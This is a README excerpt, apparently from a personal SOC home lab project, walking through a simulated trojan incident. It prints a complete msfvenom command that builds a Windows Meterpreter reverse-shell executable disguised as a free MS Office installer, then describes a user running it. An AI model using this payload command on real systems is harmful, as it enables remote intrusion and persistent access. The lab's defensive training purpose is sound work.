san1cs/SOC_Home_Lab/6_Threat_Detection_&_Incident_Response/README.md

 ### 2.6.Lessons Learned

 * This test confirmed that our Endpoint Protection (AV) is working correctly by watching file-write operations.
 A key lesson is that security isn't just about the "Firewall" it’s about the Antivirus catching threats that are created or moved manually on the disk.

+---

+## 3. Identifying Suspicious Activity

+### 3.1.Incident Walkthrough: Backdoor & Persistence

+* **Phase 1: Attacker POV (Creation & Hosting)**

+A backdoor payload was created using MSFvenom: `sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.251.3 LPORT=4444 --platform windows -a x64 -f exe -o MS_Office_Free.exe`.
+It was hosted on a pirate website, waiting for the victim to download and open the setup file.

+* **Phase 2: User POV (Infection & Persistence)**

+Bob, a standard user, wanted a free MS Office and downloaded the file from "pirate" site.
+He ignored the Windows Defender warnings and ran the installer.
+But nothing happened.
+He thought the installer was "broken."
+In the background, the Trojan established a backdoor.
+Persistence was setup by the attacker after received a remote connection.

+## 3.2.Backdoor Detection